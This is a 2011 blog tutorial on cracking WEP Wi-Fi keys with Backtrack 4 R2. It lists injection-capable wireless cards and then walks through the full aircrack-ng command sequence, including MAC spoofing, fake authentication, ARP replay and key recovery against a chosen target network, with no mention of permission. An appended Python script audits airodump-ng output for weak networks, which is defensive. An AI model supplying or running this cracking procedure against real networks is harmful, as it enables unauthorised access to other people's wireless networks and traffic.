Tuesday, December 13, 2011

HOW TO CRACK WIFI WEP KEYS using BACKTRACK 4 R2

This is my friend's original tutorial on how to crack WEP or WPA using Backtrack 4 Linux.

Before you set up your cracking machine, which is Backtrack 4, make sure that your Backtrack 4 version is R2, not the Final release, because the Final release is for cracking WEP only. Backtrack 4 R2 lets you crack WPA or WEP.

Before you do any cracking, make sure that you have a good wireless card. If you don't know which wireless card to buy, here is the list (source: the BT4 Wiki):

AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43 driver, works well - passed
Rockland N3 (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
Edimax EW-7318USG USB (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers - passed
ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers - passed
Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb driver - passed
Ubiquiti SRC - using the mac80211 ath9k driver - passed
Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 driver - passed
Dlink WNA-2330 PCMCIA - using the mac80211 ath5k driver - passed
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k driver - passed
Netgear wg111v2 - using the mac80211 rtl8187 driver - passed
ZyXEL AG-225H v2 - using the mac80211 zd1211 driver - passed
Intel 4956/5xxx - using the iwlagn driver - passed

The Edimax USB Wi-Fi adapter is usually a good choice for Backtrack 4. Whatever card you pick, it must support packet injection and RFMON (monitor mode).

Once you are all set up with Backtrack 4 you can start cracking. (Make sure your BT4 network connection is already set up first.)

1. Boot the computer with Backtrack 4 (login: root, password: toor; type "poweroff" to shut down when you are finished).
2. Open Konsole and type the following:
3. airmon-ng (you will find your interface name here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours as well. Replace every wlan0 below with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C once you have found the WEP network you want to crack, then copy its BSSID.
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open a new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open a new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap
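The airodump-ng run in step 10 writes a (file name)-01.csv next to the .cap, and that file doubles as an inventory of which networks in range still rely on WEP or no encryption at all, which is the check a network owner wants after reading the steps above. The Python below is an added example, not code from the original post or from the aircrack-ng project; it parses the column layout airodump-ng uses for that CSV (an access-point table, a blank line, then a station table) and lists the weak networks. The sample rows, BSSIDs and ESSIDs are constructed.

```python
"""Audit an airodump-ng CSV (<prefix>-01.csv) for access points still using WEP or no encryption."""
import csv
import io

# Constructed sample in the layout airodump-ng writes: an access-point table,
# a blank line, then a station table. All addresses and names are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:AA:BB:01, 2011-12-13 10:00:01, 2011-12-13 10:05:21,  6,  54, WEP , WEP, , -40,      120,     3000,   0.  0.  0.  0,   9, legacy-ap, 
00:11:22:AA:BB:02, 2011-12-13 10:00:02, 2011-12-13 10:05:20, 11,  54, WPA2, CCMP, PSK, -55,       98,        0,   0.  0.  0.  0,   9, office-ap, 
00:11:22:AA:BB:03, 2011-12-13 10:00:03, 2011-12-13 10:05:19,  1,  54, OPN , , , -70,       40,        0,   0.  0.  0.  0,   5, guest, 
00:11:22:AA:BB:04, 2011-12-13 10:00:04, 2011-12-13 10:05:18,  6,  54, WPA2 WPA, CCMP TKIP, PSK, -60,       77,        0,   0.  0.  0.  0,   8, mixed-ap, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:FD:FB:C2, 2011-12-13 10:00:05, 2011-12-13 10:05:20, -50,      210, 00:11:22:AA:BB:01,
"""

WEAK = {"WEP", "OPN"}  # OPN means the network has no encryption at all


def parse_access_points(text):
    """Return the access-point rows as dicts keyed by the CSV header names.

    The AP table runs from its header to the first blank line; the station
    table after that blank line has a different header and is ignored here.
    """
    text = text.replace("\r\n", "\n").strip("\n")
    ap_table = text.split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_table), skipinitialspace=True)
    rows = []
    for row in reader:
        # The trailing comma on each row yields an extra unnamed field (key None); drop it.
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k is not None})
    return rows


def weak_networks(text):
    """List (BSSID, ESSID, Privacy) for every AP whose Privacy column contains WEP or OPN.

    Mixed-mode values such as "WPA2 WPA" are split so each token is checked.
    """
    findings = []
    for ap in parse_access_points(text):
        tokens = ap["Privacy"].split()
        if WEAK & set(tokens):
            findings.append((ap["BSSID"], ap["ESSID"], " ".join(tokens)))
    return findings


if __name__ == "__main__":
    for bssid, essid, privacy in weak_networks(SAMPLE_CSV):
        print(f"{bssid}  {essid:<12} {privacy}  -> migrate to WPA2")
```

Point the script at a real (file name)-01.csv by reading the file into a string and passing it to weak_networks; any BSSID it lists is one whose traffic is recoverable with exactly the steps above.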
